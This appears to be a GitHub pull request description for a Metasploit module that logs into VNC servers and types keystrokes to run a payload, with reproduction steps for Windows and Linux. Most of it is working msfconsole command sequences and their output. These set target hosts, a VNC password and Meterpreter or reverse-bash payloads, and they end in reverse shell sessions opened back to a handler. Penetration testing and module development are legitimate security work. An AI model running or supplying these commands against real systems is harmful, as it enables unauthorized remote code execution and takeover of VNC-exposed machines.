Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module connects to a VNC service and sends keystrokes to "type" and execute a payload.
(For extra fun watch the commands getting typed in the Windows/Linux GUI:))
Windows
Steps to reproduce (Tested on Windows 7 Pro SP1 64-bit):
Download Tightvnc (http://www.tightvnc.com/download.php) or RealVNC (https://www.realvnc.com/download/)
Install and set a password
msf > use exploit/multi/vnc/vnc_keyboard_exec
msf exploit(vnc_keyboard_exec) > set RHOST 192.168.2.131
RHOST => 192.168.2.131
msf exploit(vnc_keyboard_exec) > set target 0
target => 0
msf exploit(vnc_keyboard_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(vnc_keyboard_exec) > set PASSWORD pwned
PASSWORD => pwned
msf exploit(vnc_keyboard_exec) > exploit
[] Started reverse handler on 192.168.2.130:4444
[] 192.168.2.131:5900 - Trying to authenticate against VNC server
[] 192.168.2.131:5900 - Authenticated
[] 192.168.2.131:5900 - Opening Run command
[] 192.168.2.131:5900 - Typing and executing payload
[] Sending stage (884782 bytes) to 192.168.2.131
[*] Meterpreter session 77 opened (192.168.2.130:4444 -> 192.168.2.131:49243) at 2015-07-10 13:32:49 +0700
meterpreter >
Linux
Steps to reproduce (tested on Kali linux):
apt-get install tightvncserver
tightvncpasswd
tightvncserver
Check on which port tightvnc is started, on my machine this was 5901 (5900+1 because of new X11 session on :1)
msf > use exploit/multi/vnc/vnc_keyboard_exec
msf exploit(vnc_keyboard_exec) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(vnc_keyboard_exec) > set target 2
target => 2
msf exploit(vnc_keyboard_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(vnc_keyboard_exec) > set RPORT 5901
RPORT => 5901
msf exploit(vnc_keyboard_exec) > set PASSWORD pwned
PASSWORD => pwned
msf exploit(vnc_keyboard_exec) > exploit
[] Started reverse handler on 192.168.2.130:4444
[] 192.168.2.130:5901 - Trying to authenticate against VNC server
[] 192.168.2.130:5901 - Authenticated
[] 192.168.2.130:5901 - Opening "Run Application"
[] 192.168.2.130:5901 - Opening xterm
[] 192.168.2.130:5901 - Typing and executing payload
[*] Command shell session 76 opened (192.168.2.130:4444 -> 192.168.2.130:34240) at 2015-07-10 13:30:33 +0700